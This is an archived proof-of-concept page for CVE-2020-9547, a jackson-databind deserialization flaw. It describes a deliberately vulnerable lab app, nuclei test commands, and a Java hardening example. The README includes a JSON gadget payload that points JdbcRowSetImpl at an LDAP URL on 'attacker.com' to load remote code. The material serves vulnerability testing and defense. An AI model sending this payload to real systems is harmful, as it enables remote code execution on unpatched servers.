
CVE-2020-9547 PoC — FasterXML jackson-databind Code Issue Vulnerability

Associated Vulnerability
Title: FasterXML jackson-databind Code Issue Vulnerability (CVE-2020-9547)
Description: FasterXML jackson-databind is a Java library from FasterXML that converts data formats such as XML and JSON to and from Java objects. Jackson can easily turn Java objects into JSON objects and XML documents, and likewise turn JSON and XML back into Java objects. A code issue vulnerability exists in FasterXML jackson-databind 2.x versions before 2.9.10.4. An attacker can exploit it with a specially crafted request to execute arbitrary code on the system.
Readme
# CVE-2020-9547 Vulnerable Application

This is a vulnerable Spring Boot application designed to test the CVE-2020-9547 vulnerability in FasterXML jackson-databind.

## Vulnerability Details

- **CVE ID**: CVE-2020-9547
- **Severity**: Critical (CVSS 9.8)
- **Affected Version**: jackson-databind < 2.9.10.4
- **Vulnerability Type**: Deserialization RCE
- **Vulnerable Class**: `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig`

## Setup Instructions

### Prerequisites
- Docker and Docker Compose
- Maven (for building from source)

### Quick Start with Docker

1. **Build and run the application:**
   ```bash
   docker-compose up --build
   ```

2. **Verify the application is running:**
   ```bash
   curl http://localhost:8080/health
   ```

### Building from Source

1. **Build the application:**
   ```bash
   mvn clean package
   ```

2. **Build the Docker image:**
   ```bash
   docker build -t cve-2020-9547-vulnerable-app .
   ```

3. **Run the container:**
   ```bash
   docker run -p 8080:8080 cve-2020-9547-vulnerable-app
   ```

## Testing the Vulnerability

### Using Nuclei

1. **Run the nuclei template against the vulnerable application:**
   ```bash
   nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml
   ```

2. **With interactsh for out-of-band detection:**
   ```bash
   nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml -oob
   ```

### Manual Testing

The application exposes several endpoints that accept JSON payloads:

- `POST /` - Root endpoint
- `POST /api` - API endpoint
- `POST /json` - JSON endpoint
- `PUT /data` - Data endpoint
- `GET /health` - Health check

### Example Vulnerable Payload

```json
{
  "@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@class": "java.util.HashMap",
    "userTransactionName": {
      "@class": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "ldap://attacker.com/exploit",
      "autoCommit": true
    }
  }
}
```

## Application Configuration

The vulnerable application is configured with:

- **Jackson Version**: 2.9.10.3 (vulnerable)
- **Polymorphic Type Handling**: Enabled with `LaissezFaireSubTypeValidator`
- **Default Typing**: `NON_FINAL`
- **iBatis SQLMap**: Included for the vulnerable class
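The two sections above (the example payload and the application configuration) describe the property the CVE depends on: with default typing enabled and a validator that permits everything, any class name supplied in `@class` is resolved and instantiated. The following is an added example, not code from this repository, showing that permissive setup beside an allowlisted `PolymorphicTypeValidator` and checking how each treats a document shaped like the payload above. It assumes jackson-databind 2.10 or later (the `activateDefaultTyping` / `BasicPolymorphicTypeValidator` API); the package prefix `com.example.model.` and the placeholder LDAP host are invented for the example, and the gadget-shaped document is only ever fed to the hardened mapper.

```java
// Added example (not part of the PoC repository). Assumes jackson-databind 2.10+.
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.impl.LaissezFaireSubTypeValidator;

public class DefaultTypingCheck {

    // The configuration the README describes: NON_FINAL default typing with a validator
    // that never denies, so every "@class" value in the input is honoured.
    static ObjectMapper permissiveMapper() {
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(LaissezFaireSubTypeValidator.instance,
                ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
        return m;
    }

    // Hardened form: only type ids under an application-owned package are resolvable.
    // "com.example.model." is a hypothetical package prefix chosen for this example.
    static ObjectMapper allowlistedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
        ObjectMapper m = new ObjectMapper();
        m.activateDefaultTyping(ptv, ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
        return m;
    }

    // Returns true when the mapper refuses the document's type id instead of instantiating it.
    // InvalidTypeIdException is raised during type-id resolution, before any constructor or
    // setter of the named class can run.
    static boolean rejectsTypeId(ObjectMapper mapper, String json) {
        try {
            mapper.readValue(json, Object.class);
            return false;
        } catch (InvalidTypeIdException e) {
            return true;
        } catch (java.io.IOException e) {
            // Any other parse or mapping failure: the document was not accepted either.
            return true;
        }
    }

    public static void main(String[] args) {
        // Constructed sample documents. The first mirrors the README's payload structure with
        // the JNDI URL replaced by an obviously fake placeholder; the second is a harmless map.
        String gadgetShapedDoc = "{\"@class\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\","
                + "\"properties\":{\"@class\":\"java.util.HashMap\","
                + "\"userTransactionName\":{\"@class\":\"com.sun.rowset.JdbcRowSetImpl\","
                + "\"dataSourceName\":\"ldap://PLACEHOLDER-HOST/x\",\"autoCommit\":true}}}";
        String mapDoc = "{\"@class\":\"java.util.HashMap\",\"k\":\"v\"}";

        // Only the allowlisted mapper is pointed at the gadget-shaped document: the outer
        // type id is not under the allowed prefix, so resolution stops there.
        System.out.println("allowlisted mapper rejects gadget-shaped document: "
                + rejectsTypeId(allowlistedMapper(), gadgetShapedDoc));

        // The permissive mapper is exercised on the harmless document only. It accepts a
        // caller-chosen class name; the allowlisted mapper refuses the same document because
        // java.util.HashMap is not an application type either.
        System.out.println("permissive mapper rejects plain HashMap type id: "
                + rejectsTypeId(permissiveMapper(), mapDoc));
        System.out.println("allowlisted mapper rejects plain HashMap type id: "
                + rejectsTypeId(allowlistedMapper(), mapDoc));
    }
}
```

Expected behaviour is `true`, `false`, `true` for the three lines. The allowlist is the fallback; the stronger fix for an application that does not need polymorphic deserialization of untrusted input is to leave default typing disabled entirely (the Spring Boot default `ObjectMapper` does not enable it) and to upgrade past 2.9.10.4, so that neither the README's gadget class nor any later addition to the blocklist matters.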

## Security Notice

⚠️ **WARNING**: This application is intentionally vulnerable and should only be used in controlled testing environments. Do not deploy this in production or on public networks.

## Cleanup

To stop and remove the containers:

```bash
docker-compose down
```

To remove the Docker image:

```bash
docker rmi cve-2020-9547-vulnerable-app
```

## References

- [CVE-2020-9547 Details](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)
- [Jackson Databind Issue #2620](https://github.com/FasterXML/jackson-databind/issues/2620)
- [Nuclei Template](http/cves/2020/CVE-2020-9547.yaml)
File Snapshot

[4.0K] /data/pocs/133d6335f952674947387f4ff766f136ba607f1c
├── [1.1K] build.sh
├── [ 491] docker-compose.yml
├── [ 693] Dockerfile
├── [5.0K] pom.xml
├── [2.8K] README.md
├── [ 357] render.yaml
├── [4.0K] src
│   └── [4.0K] main
│       ├── [4.0K] java
│       │   └── [4.0K] com
│       │       └── [4.0K] example
│       │           └── [ 12K] VulnerableApp.java
│       └── [4.0K] resources
│           └── [ 402] application.properties
├── [1.3K] test-dns.sh
├── [2.4K] test-payloads.json
└── [3.2K] test-vulnerability.sh

6 directories, 11 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.